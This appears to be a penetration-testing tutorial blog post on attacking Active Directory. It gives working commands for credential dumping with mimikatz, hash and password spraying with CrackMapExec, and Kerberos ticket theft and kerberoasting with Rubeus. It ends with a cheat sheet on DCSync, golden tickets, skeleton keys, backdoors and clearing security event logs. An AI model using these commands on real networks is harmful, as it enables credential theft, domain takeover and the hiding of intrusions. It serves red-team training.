Breaking Into Active Directory: What Every Beginner Needs to Know
When attacking Active Directory, the goal isn’t just popping shells — it’s compromising the domain. And that requires a very different mindset than attacking standalone systems.
On a single host, getting SYSTEM might feel like the end. In AD, that’s just the beginning. The real power lies in how everything is connected: users, machines, services, and most importantly, the trust relationships that bind them together.
If you want to succeed in an internal engagement, you need to stop thinking in terms of boxes — and start thinking in terms of paths.
Why Active Directory Demands a Different Mindset
Active Directory isn’t just a network of machines — it’s a domain-wide system built on delegation, inheritance, and trust. Every user, computer, and service exists in a web of relationships, and those relationships can be exploited.
Getting local admin or SYSTEM on one machine doesn’t mean the job is done — it means you’ve opened the first door. With the right knowledge, that access can lead to more machines, more credentials, and eventually, the domain controller.
Your real target is the path that connects these pieces:
Initial Foothold → Credential Dumping → Lateral Movement → Abuse of Permissions → Domain Compromise
Each step enables the next. The key is recognizing the value of what you find — credentials, tokens, group memberships, sessions, permissions — and knowing how to turn that value into access.
Trust Is the Real Vulnerability
Active Directory is built on trust, but trust is fragile, and often misconfigured. These are the types of assumptions that open doors for attackers:
- A user is trusted to log in locally
- A service account is trusted to run with high privileges
- A domain group is trusted on specific systems
When these assumptions go unmanaged, they become attack vectors. This is where BloodHound excels — it maps these trust paths and shows you what’s possible from your current position.
And if you’re on a machine where a Domain Admin recently logged in and you have local admin rights? You’re in a perfect position to:
# Dump credentials from memory
mimikatz.exe
sekurlsa::logonpasswords
# Extract NTLM hashes
sekurlsa::ekeys
You didn’t exploit a vulnerability — you exploited access and trust.
Why Service Accounts Are Gold
Service accounts are often overlooked but incredibly valuable. They’re:
- Frequently set with never-expiring passwords
- Sometimes members of high-privilege groups
- Routinely used across multiple machines
Many are also vulnerable to Kerberoasting because they’re tied to Service Principal Names (SPNs). If you can request a TGS for a service account and crack the hash, you might end up with Domain Admin credentials.
Service accounts are quiet, persistent, and powerful, exactly what attackers love and defenders forget.
The Hidden Power of Credential Reuse
Credential reuse is one of the biggest weaknesses in AD environments.
A reused local admin password across 20 machines? That’s a lateral movement playground. All it takes is one hash:
# Use CrackMapExec to spray the hash across the subnet
crackmapexec smb 10.0.0.0/24 -u Administrator -H <NTLM hash>
Same goes for service accounts reused across environments. The moment you crack one, the blast radius can be enormous.
That’s why controls like LAPS, password rotation, and privilege segmentation are critical — not just best practices.
The Magic of Kerberos Tickets
Kerberos is powerful. But once you understand how it works, it becomes a weapon.
- TGT (Ticket Granting Ticket): Allows you to impersonate a user across the domain
- TGS (Ticket Granting Service): Grants access to services
With tools like Rubeus, you can steal, reuse, or forge these tickets for stealthy, credential-less access.
Examples:
# Dump TGT/TGS tickets
Rubeus.exe dump
# Pass-the-ticket attack
Rubeus.exe ptt /ticket:<base64ticket>
# Kerberoast a service account
Rubeus.exe kerberoast /outfile:hashes.txt
Mastering Kerberos means moving silently, bypassing traditional credential defenses.
Admin Rights vs. Logon Rights: Why It Matters
In Active Directory, not all access is created equal.
Just because a user can log into a machine doesn’t mean they can control it. There’s a key difference:
- Logon rights let you start a session — like any regular user
- Admin rights give you real power — the ability to dump credentials, manipulate services, install tools, or escalate privileges
Here’s where it gets interesting:
If a Domain Admin logs into a machine where you have local admin rights, you can extract their credentials from memory, even if they’ve already logged out.
# Dump credentials from memory
mimikatz.exe
sekurlsa::logonpasswords
That’s how a seemingly unimportant machine becomes the gateway to the entire domain. It’s not just about where you are, it’s about who has trusted that machine before you.
Finding Out Where You Have Local Admin Access
After compromising a user account, whether it’s a service account or a regular user with a known password or NTLM hash — your next step is to find out:
Where else can these credentials give me admin access?
This is how you build your attack path. Admin rights on one machine might open the door to others, leading you closer to the domain controller.
Scanning for Access with CrackMapExec
CrackMapExec (CME) is a powerful tool that lets you scan entire subnets to test a user’s credentials against many machines at once — and see where that user is a local administrator.
Here’s how you use it:
crackmapexec smb 10.0.0.0/24 -u svc_account -p Password123
# Tests credentials against each host over SMB
# Shows login success and whether the user has admin rights
In the output, look for this:
[+] 10.0.0.12:445 svc_account Pwn3d!
Login successful→ Valid credentialsPwn3d!→ This user has local admin rights on that machine
CrackMapExec determines admin rights by trying privileged actions (like accessing the Service Control Manager). If they succeed, you get a “Pwn3d!” — meaning full control.
What If You Have an NTLM Hash?
You can still test access using pass-the-hash, which is especially useful when local admin accounts reuse the same password across machines:
crackmapexec smb 10.0.0.0/24 -u Administrator -H <NTLM_hash> --local-auth
# --local-auth tells CME to test against local accounts instead of domain users
This is a common path to compromise when LAPS isn’t configured and local accounts are reused throughout the environment.
What If You Want to Test a Password Across Many Users?
That’s called a password spray — a different technique where you test one password against multiple usernames to catch password reuse.
crackmapexec smb 10.0.0.0/24 -u users.txt -p Summer2025!
# Tests the same password across a list of users
This works well when you suspect a common password policy or poor hygiene across the domain.
Why This Is a Game-Changer
Finding out where your compromised user has local admin access tells you:
- Where you can move laterally
- Which systems you can dump more credentials from
- Where Domain Admins may have logged in
This is how attacks scale. One foothold → multiple machines → Domain Admin.
A Realistic Attack Path
Let’s put it all together with a practical example:
1. Phish a low-priv user (jdoe) on a workstation
2. Escalate to SYSTEM → dump credentials with Mimikatz
3. Use dumped creds to move laterally to another machine
4. Find service account (svc_sql) logged in → dump TGS tickets with Rubeus
5. Kerberoast svc_sql → crack the hash → gain Domain User credentials
6. svc_sql has GenericAll over a Domain Admin account
7. Abuse ACL to add your user to Domain Admin group
8. DCSync or dump NTDS.dit → full domain compromise
This is more than a chain of exploits. It’s an attack path — and it’s powered by access, trust, and understanding relationships, not just vulnerabilities.
Why Local Privilege Escalation Isn’t Enough
Getting SYSTEM on a host is useful — but it’s not the goal.
In AD, you can:
- Be
SYSTEMand still have no access to the domain - Never get
SYSTEMand still own the domain
That’s why focusing solely on local privilege escalation will leave you blind to the bigger picture. AD exploitation demands a strategic view — you’re not just breaking in, you’re navigating a map of trust.
How to Think Like an AD Attacker
Start asking better questions:
- Who am I in the domain?
- What privileges or tokens do I have?
- Who else is logged in here?
- Where can I move laterally?
- What permissions do I have over other objects or users?
Your goal isn’t to be root or SYSTEM. Your goal is to control the domain.
What’s Next
In the upcoming posts, we’ll walk through each phase of the AD attack path — from local privilege escalation to lateral movement to domain escalation — with real examples, commands, and tools.
You’ll learn how to:
- Spot misconfigurations
- Abuse trust paths
- Capture and reuse credentials
- Move through the domain like a ghost
┌──────────────────────────────────────────────────────────────────────────────┐
│ 1. INTRODUCTION TO ACTIVE DIRECTORY │
├──────────────────────────────────────────────────────────────────────────────┤
│ • Domains, Forests, DCs # Understand the structure of AD │
│ • Users, Groups, GPOs, Trusts # Learn core objects │
│ • Attacker Mindset # AD is built on trust │
└──────────────────────────────┬───────────────────────────────────────────────┘
│
▼
┌──────────────────────────────────────────────────────────────────────────────┐
│ 2. ENUMERATION │
├──────────────────────────────────────────────────────────────────────────────┤
│ • PowerView # PowerShell AD enumeration module │
│ - Get-DomainUser # List all domain users │
│ - Get-DomainGroup # List groups in the domain │
│ - Find-LocalAdminAccess # See where user is local admin │
│ • BloodHound / SharpHound # Visual map of permissions/trusts │
│ - SharpHound.exe -c All # Collect full AD data │
│ • Kerbrute # Kerberos username/password spray │
│ - userenum / passwordspray modes # Brute force user/password combos │
│ • smbclient -L //target -N # Enumerate open shares │
│ • rpcclient # Old but gold user/group listing │
│ • ldapsearch # Dump raw AD data via LDAP │
└──────────────────────────────┬───────────────────────────────────────────────┘
│
▼
┌──────────────────────────────────────────────────────────────────────────────┐
│ 3. EXPLOITATION │
├──────────────────────────────────────────────────────────────────────────────┤
│ • AS-REP Roasting # Attack users without pre-auth │
│ - getnpusers.py # Dumps hash for offline cracking │
│ - Rubeus.exe asreproast # In-memory version (Windows) │
│ • Kerberoasting # Crack SPN service account hashes │
│ - GetUserSPNs.py # Request TGS tickets for cracking │
│ - Rubeus.exe kerberoast # Same as above, in Windows │
│ • Password Spraying # Try common passwords across users │
│ - kerbrute passwordspray # Safe brute-force via Kerberos │
│ - crackmapexec smb # Check login success over SMB │
│ • GPP Credential Theft # Decrypt Group Policy stored creds │
│ - smbclient + gpp-decrypt # From SYSVOL\Groups.xml │
│ • Share Mining # Look for stored creds, scripts │
│ - smbclient or mount then mget # Recursively download files │
└──────────────────────────────┬───────────────────────────────────────────────┘
│
▼
┌──────────────────────────────────────────────────────────────────────────────┐
│ 4. LATERAL MOVEMENT │
├──────────────────────────────────────────────────────────────────────────────┤
│ • CrackMapExec # Check where creds are valid │
│ - CME smb 10.0.0.0/24 -u user -p x # Credential spraying │
│ • Pass-the-Hash # Use NTLM hash to authenticate │
│ - psexec.py or CME with -H flag # Full control with just a hash │
│ • Pass-the-Ticket # Use Kerberos ticket for auth │
│ - Rubeus.exe ptt /ticket:t.kirbi # Inject into current session │
│ • Overpass-the-Hash # Request a TGT from just an NTLM │
│ - Rubeus.exe asktgt + ptt # Create ticket → inject │
│ • Evil-WinRM # WinRM shell for remote access │
│ - evil-winrm -i target -u user -H x # Great for post-access operations │
│ • Token Impersonation # Steal tokens from memory │
│ - mimikatz token::list # View current tokens │
│ - token::impersonate x # Become another user │
│ • Session Enumeration # See who’s logged into what │
│ - Get-NetSession # Shows logged-in domain users │
└──────────────────────────────┬───────────────────────────────────────────────┘
│
▼
┌──────────────────────────────────────────────────────────────────────────────┐
│ 5. PRIVILEGE ESCALATION (DOMAIN) │
├──────────────────────────────────────────────────────────────────────────────┤
│ • ACL Abuse (GenericAll, WriteDACL) # Abusable permissions in AD │
│ - Add-DomainGroupMember # Add user to Domain Admins │
│ - BloodHound query: Shortest Path # Find who can control what │
│ • Delegation Attacks # Abuse Kerberos impersonation │
│ - Rubeus.exe s4u / tgtdeleg # Request tickets for other users │
│ • RBCD Abuse # Add yourself to msDS-AllowedToAct │
│ - Set-ADComputer or modify ACL # Then impersonate domain users │
│ • AdminSDHolder Backdoor # Make privileges persist │
│ - Modify AdminSDHolder ACL # Inherits into protected groups │
│ • Group Hijacking # Abuse nested group memberships │
│ - Add yourself to IT_Admins # Escalate via indirect trust │
│ • DCSync Attack # Pull all domain hashes │
│ - mimikatz lsadump::dcsync # Requires Replication rights │
└──────────────────────────────┬───────────────────────────────────────────────┘
│
▼
┌──────────────────────────────────────────────────────────────────────────────┐
│ 6. PERSISTENCE, DETECTION EVASION & CLEANUP │
├──────────────────────────────────────────────────────────────────────────────┤
│ • Golden Ticket # Unlimited access via forged TGT │
│ - mimikatz kerberos::golden # Requires KRBTGT hash │
│ - kerberos::ptt golden.kirbi # Inject golden ticket │
│ • Silver Ticket # Access a single service stealthily │
│ - kerberos::golden with /service:X # No need to hit the KDC │
│ • Skeleton Key # Master password for all accounts │
│ - mimikatz misc::skeleton # Password = mimikatz │
│ • SIDHistory Abuse # Hide privilege escalation in SIDs │
│ - mimikatz sid::inject # Grants DA via SID inheritance │
│ • AdminSDHolder Persistence # ACL change that sticks │
│ - Set-DomainObjectACL # Re-applied by SDProp every 60 min │
│ • GPO Backdoors # Deploy scheduled tasks, users │
│ - Drop script in SYSVOL # Or modify GPO startup │
│ • Scheduled Tasks / Services # Auto-run backdoors or payloads │
│ - schtasks / sc.exe create # Run as SYSTEM │
│ • Log Cleaning # Hide your activity trail │
│ - wevtutil cl Security # Clears event logs │
└──────────────────────────────────────────────────────────────────────────────┘